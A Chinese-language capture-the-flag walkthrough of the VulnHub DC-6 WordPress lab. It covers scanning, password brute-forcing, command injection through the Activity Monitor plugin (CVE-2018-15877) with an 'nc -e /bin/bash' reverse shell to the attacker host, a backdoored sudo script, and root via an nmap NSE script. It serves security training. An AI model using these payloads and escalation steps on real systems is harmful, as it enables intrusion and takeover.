靶機(jī)描述
Description
DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
This isn't an overly difficult challenge so should be great for beginners.
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
Technical Information
DC-6 is a VirtualBox VM built on Debian 64 bit, but there shouldn't be any issues running it on most PCs.
I have tested this on VMWare Player, but if there are any issues running this VM in VMware, have a read through of this.
It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.
Installation is simple - download it, unzip it, and then import it into VirtualBox or VMWare and away you go.
NOTE: You WILL need to edit your hosts file on your pentesting device so that it reads something like:
192.168.0.142 wordy
NOTE: I've used 192.168.0.142 as an example. You'll need to use your normal method to determine the IP address of the VM, and adapt accordingly.
This is VERY important.
And yes, it's another WordPress based VM (although only my second one).
實(shí)驗(yàn)環(huán)境
- 攻擊主機(jī)kali2020:172.25.0.69
- 靶機(jī)DC6:mac地址00:0c:29:90:0a:a3
DC6下載地址:https://www.vulnhub.com/entry/dc-6,315/
根據(jù)靶機(jī)描述信息修改本機(jī)hosts文件
hosts文件路徑 - windows:C:\Windows\System32\drivers\etc
-
linux:/etc/hosts
image.png
0x01 主機(jī)發(fā)現(xiàn)
抓包得到DC6靶機(jī)IP為172.25.0.68
kali@kali:~$ sudo netdiscover -i eth0 -r 172.25.0.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
17 Captured ARP Req/Rep packets, from 4 hosts. Total size: 1020
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
172.25.0.1 00:50:56:c0:00:08 9 540 VMware, Inc.
172.25.0.2 00:50:56:f8:42:a0 4 240 VMware, Inc.
172.25.0.100 00:50:56:f6:d0:4b 2 120 VMware, Inc.
172.25.0.68 00:0c:29:90:0a:a3 2 120 VMware, Inc.
0x02 端口掃描
kali@kali:~$ nmap -A -p- 172.25.0.68
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-26 05:33 EST
Nmap scan report for wordy (172.25.0.68)
Host is up (0.00029s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
| 256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_ 256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-generator: WordPress 5.1.1
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Wordy – Just another WordPress site
|_https-redirect: ERROR: Script execution failed (use -d to debug)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.31 seconds
0x03 信息收集
由于DC6基于wordpressCMS搭建
直接用wpscan掃描
參數(shù)用法詳情:-e 枚舉 u用戶名 --plugins-detection vp含有漏洞的插件 mixed 混合模式(主動(dòng)加被動(dòng))
收集到后臺(tái)用戶名和后臺(tái)登錄頁(yè)面博个,并制作用戶字典user.dic為下一步密碼爆破做準(zhǔn)備
kali@kali:~$ wpscan --url http://wordy -e vp,u --plugins-detection mixed
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ?
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.7.6
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://wordy/
[+] Started: Wed Feb 26 05:38:53 2020
Interesting Finding(s):
[+] http://wordy/
| Interesting Entry: Server: Apache/2.4.25 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://wordy/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://wordy/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://wordy/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] http://wordy/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).
| Found By: Rss Generator (Passive Detection)
| - http://wordy/index.php/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
| - http://wordy/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://wordy/wp-content/themes/twentyseventeen/
| Last Updated: 2019-05-07T00:00:00.000Z
| Readme: http://wordy/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.2
| Style URL: http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1, Match: 'Version: 2.1'
[+] Enumerating Vulnerable Plugins (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:03 <=====> (2206 / 2206) 100.00% Time: 00:00:03
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=========> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] mark
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] graham
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] sarah
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] jens
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
[+] Finished: Wed Feb 26 05:39:09 2020
[+] Requests Done: 2274
[+] Cached Requests: 6
[+] Data Sent: 518.972 KB
[+] Data Received: 974.406 KB
[+] Memory used: 223.238 MB
[+] Elapsed time: 00:00:16
0x04 后臺(tái)登錄表單爆破
按照DC6描述來(lái)制作密碼字典
gunzip /usr/share/wordlists/rockyou.txt.gz
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt //破譯含有k01的字符行
使用wpscan進(jìn)行密碼爆破
wpscan --url http://wordy -U user.dic -P passwords.txt
得到 Username: mark, Password: helpdesk01
0x04 漏洞發(fā)現(xiàn)
利用爆破得到的后臺(tái)用戶賬密登錄后臺(tái)
image.png
發(fā)現(xiàn)網(wǎng)站安裝了activity_monitor插件涩搓,思路:查找該插件存在漏洞
發(fā)現(xiàn)存在編號(hào)CVE-2018-15877遠(yuǎn)程命令執(zhí)行漏洞
利用方法:利用bp抓取http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools頁(yè)面的http包輸入ip疮蹦,點(diǎn)擊lookup寝贡,通過(guò)抓包修改ip參數(shù)的值為baidu.com | nc -e /bin/bash 172.25.0.69 1234
image.png
在mark用戶家目錄下的stuff目錄下的things-to-do.txt中拿到graham用戶的密碼
www-data@dc-6:/home/mark/stuff$ cat things-to-do.txt
cat things-to-do.txt
Things to do:
- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement
www-data@dc-6:/home/mark/stuff$
0x05 sudo提權(quán)
ssh連接graham用戶晓勇,并查看sudo權(quán)限
graham@dc-6:~$ sudo -l
Matching Defaults entries for graham on dc-6:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User graham may run the following commands on dc-6:
(jens) NOPASSWD: /home/jens/backups.sh
思路:在backups.sh腳本中追加nc反彈shell拿到j(luò)ens用戶權(quán)限
graham@dc-6:/home/jens$ cat >>backups.sh <<EOF
> nc -e /bin/bash 172.25.0.69 6666
> EOF
graham@dc-6:/home/jens$ sudo -u jens ./backups.sh
tar: Removing leading `/' from member names
kali@kali:~$ nc -lvvp 6666
listening on [any] 6666 ...
connect to [172.25.0.69] from wordy [172.25.0.68] 33638
python -c 'import pty;pty.spawn("/bin/bash")'
查看jens用戶能以sudo執(zhí)行的命令
jens@dc-6:~$ sudo -l
sudo -l
Matching Defaults entries for jens on dc-6:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
思路:利用nmap調(diào)用腳本切換root權(quán)限
jens@dc-6:~$ echo 'os.execute("/bin/sh")' > getroot.nse
echo 'os.execute("/bin/sh")' > getroot.nse
jens@dc-6:~$ sudo nmap --script getroot.nse
sudo nmap --script getroot.nse
Starting Nmap 7.40 ( https://nmap.org ) at 2020-02-26 22:04 AEST
# whoami
root
# ls
backups.sh backups.tar.gz getroot.nse
# cd /root
# ls
theflag.txt
# cat theflag.txt
Yb dP 888888 88 88 8888b. dP"Yb 88b 88 888888 d8b
Yb db dP 88__ 88 88 8I Yb dP Yb 88Yb88 88__ Y8P
YbdPYbdP 88"" 88 .o 88 .o 8I dY Yb dP 88 Y88 88"" `"'
YP YP 888888 88ood8 88ood8 8888Y" YbodP 88 Y8 888888 (8)
Congratulations!!!
Hope you enjoyed DC-6. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.
If you enjoyed this CTF, send me a tweet via @DCAU7.
#
通過(guò)nmap提權(quán)成root權(quán)限戳粒,并拿下flag嵌巷。
